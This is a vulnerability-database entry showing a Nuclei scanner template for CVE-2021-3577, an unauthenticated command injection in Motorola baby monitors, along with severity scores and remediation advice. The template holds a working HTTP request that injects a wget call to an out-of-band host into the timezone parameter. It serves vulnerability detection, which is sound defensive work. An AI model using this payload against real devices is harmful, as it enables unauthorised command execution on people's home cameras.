Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-3577
HistorySep 24, 2021 - 11:13 p.m.

Motorola Baby Monitors - Remote Command Execution

2021-09-2423:13:24
ProjectDiscovery
github.com
4

5.8 Medium

CVSS2

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:A/AC:L/Au:N/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.2 High

AI Score

Confidence

High

0.958 High

EPSS

Percentile

99.5%

Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

id: CVE-2021-3577

info:
  name: Motorola Baby Monitors - Remote Command Execution
  author: gy741
  severity: high
  description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network.
  remediation: |
    Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks.
  reference:
    - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577
    - https://binatoneglobal.com/security-advisory/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-3577
    cwe-id: CWE-863,CWE-78
    epss-score: 0.95748
    epss-percentile: 0.99426
    cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: binatoneglobal
    product: halo\+_camera_firmware
  tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal

http:
  - raw:
      - |
        GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        words:
          - "set_city_timezone"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100efbf49aef554eb97d596d461c90180fdc9227d51f720363d3bc85c74f701fe1102200a9df2e6c8d96bc023ddef3acaba857b06bcaf96f22cde890b45b3162fa4e688:922c64590222798bb761d5b6d8e72950

5.8 Medium

CVSS2

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:A/AC:L/Au:N/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.2 High

AI Score

Confidence

High

0.958 High

EPSS

Percentile

99.5%

Related for NUCLEI:CVE-2021-3577